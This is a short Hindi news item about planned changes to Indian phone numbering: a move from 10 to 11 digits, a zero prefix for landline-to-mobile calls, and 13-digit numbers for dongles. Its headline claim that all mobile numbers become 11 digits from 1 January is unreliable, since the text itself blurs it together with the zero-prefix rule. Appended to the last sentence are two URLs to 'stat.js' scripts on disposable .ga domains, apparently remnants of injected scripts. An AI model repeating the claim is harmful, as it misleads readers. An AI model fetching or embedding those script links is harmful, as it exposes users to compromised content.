मोबाइल नंबर को लेकर अब कुछ बड़े बदलाव होने जा रहे हैं। इस बदलाव के प्रस्ताव को टेलीकॉम रेगुलेटरी ऑफ इंडिया की तरफ से जारी किया गया था, जिसे डिपार्टमेंट ऑफ टेलीकॉम ने मंजूरी दे दी है। आपको बता दें, डिपार्टमेंट ऑफ टेलीकॉम की तरफ से मोबाइल नंबर के अंको में बदलाव किया जा रहा है। बताया जा रहा है कि टेलीफोन संख्या में आप 10 की जगह 11 अंकों का नंबर होगा। यह नियम 1 जनवरी से देशभर में लागू कर दिया जाएगा।
आपको बता दें कि आप लैंडलाइन से चल फोन में कॉल करने के लिए जीरो लगाना अनिवार्य हो जाएगा इसके अलावा टेलीकॉम डिपार्टमेंट द्वारा टेलीकॉम कंपनियों को आवंटित मोबाइल नंबर की सीरीज की डिटेल निकालने का निर्देश जारी किया गया है। टेलीकॉम रेगुलेटरी ऑफ इंडिया के मुताबिक 10 की जगह 11 अंकों के मोबाइल नंबर होने से देश में मोबाइल नंबरों की उपलब्धता बढ़ जाएगी। इसी के साथ साथ TRAI की तरफ से डोंगल्स के लिए एक अलग मोबाइल नंबर जारी करने की सिफारिश भी दी गई है। जिसे 10 की बजाय 13 अंकों का नंबर करने का सुझाव दिया गया है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms